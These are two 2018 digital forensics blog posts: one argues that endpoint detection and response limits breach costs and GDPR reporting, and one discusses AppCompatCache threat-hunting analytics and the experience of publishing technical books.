Pages

Tuesday, May 08, 2018

EDR Obviates Compliance

Okay, you'll have to excuse me for the title of this blog post...I needed something to get your attention, and get you to read this, because it's important. I know that stating that "EDR obviates compliance" is going to cause a swirl of emotions in anyone's mind, and my intention was to get you to read on and hear me out; 280 characters simply is not enough to share this line of reasoning.

GDPR is just around the corner, and article 4 of GDPR defines a "personal data breach as"...

...‘personal data breach’ means a breach of security leading to the accidental or unlawful destruction, loss, alteration, unauthorised disclosure of, or access to, personal data transmitted, stored or otherwise processed...

Something to be aware of is that this definition includes ransomware, as it includes "access to" and "alteration of". 

As security professionals have been saying for quite some time now, breaches of your perimeter are going to happen, it's simply inevitable.  However, per GDPR, it's not a reportable breach until something happens with respect to 'personal data'.  The simple fact is that without adequate/suitable instrumentation and visibility, you simply won't know if personal data has been accessed during a breach.  EDR provides that visibility.

Where Are We Now?
Right now, we're "right of breach".  Most organizations are simply unprepared for breaches to occur, and breach identification comes in the form of third-party external notification.  This notification comes weeks or even months after the initial intrusion occurred, during with time the dearth of instrumentation and "evidence decay" makes it nearly impossible to definitively determine what the adversary may have done, with any degree of certainty. 

The 2018 Nuix Black Report states that 98% of those surveyed stated that they could breach the perimeter of a target organization and exfil data in 15 hrs or less.  Compare that to the 2017 Ponemon Institute report that indicated that the 'dwell time' (the time between a breach actually occurring and it being detected) was 191 days, and it's still in the triple digits.  I hardly seems far, but that's reality in today's terms.

Where we need to be is "left of breach".  We know breaches are going to occur, and we know that clean up is going to be messy, so what we need to do is get ahead of the game and be prepared.  It's not unlike boxing...if you step into the ring with gloves on, you know you're going to get hit, so it behooves you to get your gloves up and move around a bit, lessening the impact and effect of your opponent's punches. In cybersecurity, we move "left of breach" by employing monitored EDR (MDR) so that breaches can be detected and responded to early in the adversary's attack cycle, allowing us to contain and eradicate the adversary before they're able to access "critical value data", of CVD.  CVD can consist of "personal data", or PII; credit card data, or PCI; healthcare data, or PHI; or it can be intellectual property, or IP.  Regardless of what your "CVD" is, the point is that you want to detect, respond to and stop the bad guy before they're able to access it, and the only way you can do that is to instrument your infrastructure for visibility.

Costs
Chris Pogue wrote this blog post, addressing the "cost of breach" topic, almost three years ago.  With the help of our wonderful marketing department, I recently gave this webinar on reducing costs associated with breaches.  Things haven't changed...breaches are becoming more expensive; more expensive to clean up, more expensive in terms of down-time and lapses in productivity, and more expensive in terms of legal fees and fines.

While researching information for the webinar, one of the things I ran across was the fines that would have been associated with GDPR, had GDPR been in effect at the time that the Equifax breach.  In 2016, Equifax reportedly earned $3.145B USD.  High end GDPR fines can be "20M euros or 4% of world-wide operating revenue, whichever is greater", bringing the fine to $125.8M USD.  That's just the GDPR fine; that does not include direct costs associated with the IR response and investigation, subsequent notification, nor any indirect costs.

On 1 May, Alabama became the 50th US state to enact a data breach notification law, SB 318.  As you read over the stipulations regarding reporting detailed in the law, keep in mind that for the 50 US states, everyone is different.  If you store or process the personal data for US citizens, the cost associated with simply determining to which states you actually have to report is enormous!  And that's before you even report...it doesn't include the actual cost of notification, it's just the cost of determining to whom (which states) you need to report!

EDR/MDR
So where does endpoint detection and response (EDR) come in?

I've been doing DFIR work for about two decades now, and most of the work I've done has been after an incident has occurred.  Early on, the work involved a system or two thought to be infected or compromised in some manner, but it was always well after the supposed infection or compromise occurred.  In most cases, questions involving things like, "...what data was taken?" simply could not be answered.  Either the information to answer the question didn't exist due to evidence decay, or it didn't exist because that information was was never actually recorded or logged.

EDR/MDR solutions allow you to detect a breach early in the adversary's attack cycle, as one of the things monitored by most, if not all, EDR tools is the processes executed on systems.  Yes, you get a lot of 'normal' user stuff (allowing you to detect fraud and insider threats), but you also get a detailed look at the adversary's activities.

To see some really good examples of process trees showing what various attacks look like, go to Phil Burdette's Twitter feedThis tweet includes an example of a phish, with the user clicking "Enable Content" on a malicious document, leading to the implant being downloaded via bitsadminThis tweet illustrates a great example of credential theft.  I could go on and on about this, but I think that the point has been made...EDR gives you a level of visibility that you don't get through any other instrumentation.

Where I've used this information to great effect was detecting an adversary's activities within a client's infrastructure several years ago; the tool being used at the time alerted on the use of an archive utility known as "Rar".  The adversary had renamed the executable so that it was no longer 'rar.exe', but adding a password to protect the archive is not something the adversary could change, and it's what was detected in this case.  So, we had the fact that data was marshaled and archived for exfiltration (along with the password), and we further was that after exfiltrating the archives, the adversary deleted the archived data.  However, once we got an image of the system we were able to carve unallocated space and recover a number of the archives, and using the adversary's password, we were able to open the recovered archives and see exactly what data was taken. 

Today, the way to address this behavior is that rather than alerting on the condition, instead, block the process itself.  And the same thing is true with other adversary behaviors; intelligence gives us excellent insight into adversary behaviors, and using these behaviors, we can implement our EDR solution to alert on some things, but if other specific conditions are met, prevent those actions from completing.  We can further isolate the adversary by isolating the system on the network.

In March of this year, the City of Atlanta was hit with Samsam ransomware.  Interestingly enough, Secureworks, a security MSSP located within the corporate limits of the city, has a good bit of documentation as to the methodology used by the adversary that deploys the ransomware; had the city had an EDR/MDR solution in place prior to the incident, they would've detected and been able to respond to the initial breach, before the adversary was able to deploy the ransomware. 

Benefits
Given all this, the benefits of employing an EDR/MDR solution are:

1. The solution becomes part of your budget.  Employing an EDR/MDR solution is something you plan for, and include in your annual budget.  Breaches are rarely planned for.

2.  You now have definitive data illustrating the actions taken by an adversary prior to your containment and eradication procedures. You have a record of the commands they ran, the actions they took, and hence their behaviors.  You know exactly where they are within your infrastructure, and you can track back to how they got there, meaning that you can quickly contain and eradicate them.

3. Due to early detection and response, you now have definite data to support not having to report the breach.  Let's say that you detect someone on your network running the "whoami" command; this is a behavior that's been observed in many adversaries.  Alerting on this behavior will allow you to respond to the adversary during their initial recon phase, before they're able to perform credential theft, privilege escalation, and lateral movement.  All of their activity and behavior is recorded, and it's a short list because you've detected and responded to them very early in their attack cycle.  As 'personal data' was not accessed, you've obviated your need to report, and obviated costs associated with fines, notification, clean-up, etc.

Monday, May 07, 2018

Tools, Books, Lessons Learned

Tools
As part of my Sunday morning reading a bit ago, I was fascinated by an evolving tweet thread...Eric recently tweeted some random threat hunting advice involving shimcache data.  In response, Nick tweeted regarding an analytic approach to using shimcache/appcompatcache data, at scale, along with AmCache data.  Nick also provided a link to the FireEye blog post that describes their AppCompatProcessor tool.

I really like this approach, and I think that it's a fantastic step forward, not only in single system analytics, analyzing one system through the traditional, "dead box" analysis, but also with respect to an enterprise-wide approach to threat hunting and response.  In many ways, threat hunting and response is the next logical step in DFIR work, isn't it?  Taking what you learned from one system and expanding it to many systems just kinda makes sense, and it looks as though what the FireEye folks did was take what they learned from many single system examinations and developed a process, with an accompanying tool, from that information.

From even a single system analysis approach, there are still a number of analysts within the community who either aren't parsing the AppCompatCache data as a matter of course, or they're misinterpreting the time stamp data all together. Back in Dec, 2016, Matt Bromiley wrote an article describing some of the important aspects of the AppCompatCache data ("important" with respect to interpretation of the data).  Also, be sure to check out read thoroughly the section named "AppCompatSecrets" here, as well as Luis's article here.  A correct understanding of the data and it's context is important going forward.

From an enterprise perspective, there are tools that do nothing more than collect/parse this data from systems, but do not provide any analytics to the data itself, in short, simply dumping this massive trove of data on the analyst.  The analytic approach described by the FireEye folks is similar in nature to the Hamming distance, something I learned about while taking Dr. Hamming's seminar at NPS; in short, the closer the temporal execution of two entries (smaller Hamming distance), the stronger the tcorr value.  This can be applied to great effect as a threat hunting technique across the enterprise.  In the case of AppCompatCache data, the time stamp does not indicate temporal execution; rather, it's a combination of a flag value and the position of the entry, in the order that it's stored within the Registry value.  The "temporal" aspect, in this case, refers to the location of entries in the data with respect to each other.

This can also be applied on a single system dead box analysis, when you look at it as a system, and include not just the System hive, but the System hive in the RegBack folder, as well as any that exist in VSCs, as well as within a memory dump.

I'd recently blogged about using several Registry and Registry-like artifacts in a much smaller approach to "analytics", looking at the use and correlation of multiple sources of data on a single system, with my base assumption being that of single system dead box analysis.  I figured, hey, it's a place to start.

Getting a Book Published
I recently had an opportunity to read Scar's blog post entitled, Finding a Publisher For Your Book.  I found it fascinating because what she wrote about is not too dissimilar from my own experiences.

I have not read her book, Windows Forensic Cookbook.  In fact, I wasn't aware of it until recently.  Once I found out about it, I checked the Amazon site and didn't see any reviews of the book; I'm not surprised...after all, this is the DFIR "community"...but I did hope to get a sense of the material within the book.  So, this isn't a book review, but rather commentary in solidarity with her experiences.

Like Scar, I've put a lot of work into writing a manuscript, only to get the proofs back for review and thinking...what?  In one instance, every single instance of "plugin" had been changed to "plug-in" in a chapter. Uh...no.  My response back to the copy editor was simply to state at the being of the chapter, "...change it back...all of it."

Scar's comments about expectations caught my attention, as well, particularly when the publisher wanted a chapter review turned around in 48 hrs.  What?!?  This is one of those things you have to be prepared for when working with publishers...they simply do not understand their suppliers, at all.  A publisher or editor works on getting multiple books out, that's what they do all day.  However, those of us writing books and providing material do other things all day, and write books when we have time.  That's right...we do the stuff during the day that makes us qualified to write books, and then actually get to write the books in our copious "free time", after putting in a full day or week of work.  These crazy deadlines are something I've pushed against, more so since I've developed greater credibility with the publisher by writing more books.  When my tech editor is working full days just like everyone else and gets a 35+ page chapter with a demand to have the review returned within 48 hrs, that's simply an unrealistic expectation that needs to be addressed up front.

I've been writing books for a while now...it didn't occur to me just how long I've been doing it until last week.  I have a book in the process of being published right now...I'm waiting on the proofs to come back for review...and I submitted a prospectus recently for another book, and the reviews of the proposal I sent in have started coming back.  One reviewer referred to WFA 1/e, published in 2005; this means that I actually started working on it late in 2003, or really in 2004.  And that wasn't my first book. All of this is to say that when I see someone write a blog post where they share their experiences in writing a book and getting it published, what I find most interesting about it is that nothing seems to have changed.  As such, a lot of what Scar wrote in her blog post rings very true, even to this day.

Finally, I've mentioned this before but I'll say it again...over the years, I've heard stories about issues folks have had working with publishers; I've had some of my own, but I like to think that I've learned from them.  Some folks don't get beyond the proposal stage for their book, and some folks have gotten to a signed contract, but drop out due to apparently arbitrary changes made by the editorial staff, after the contract was signed by both parties.  What I had proposed to the publisher I have worked with is to create a liaison position, one where I would work directly with authors (singles, groups) to help them navigate the apparent labyrinth of going from a blank sheet of paper to a published book, using what I've learned over the years.  This never really went anywhere, in part due to the turnover with the publisher...once I had found a champion for the idea, that person left the company.  The fact that after attempting to do this three times and not succeeding, and that the publisher hasn't come back to me to pursue it, tells me that they (the publisher) are happy with the status quo.

If you're interested in writing a book, you don't have to be.  Read over Scar's blog post, ask questions, etc., before you make a decision to commit to writing a book.  It isn't easy, but it can be done.  If your main fear against writing a book is that someone else is going to read it and be critical, keep in mind that no one will be as passionate as you about what you write.

Lessons Learned
I was engaged in an exchange with a trusted and respected colleague recently, and he said something to me that really struck a chord...he said that if I wanted to progress in the direction we were discussing, I've got to stop "giving stuff away for free".  He was referring to my blog (I think), and his point was well taken.  If you're like me, and really (REALLY) enjoy the work...the discovery, the learning, solving a problem in what may be a unique manner, etc...then what does something like writing books and blog posts get you?  I'm not sure what it gets others, but it doesn't lead to being able to conduct analysis, that's for sure.  I mean, why should it, right...if I put it in writing what I did or would do, any someone else can replicate it (like a recipe for tollhouse cookies) then why reach out and say, "Hey, Harlan...I could really use your help on this...", or "...can you analyze these images for malicious activity..."?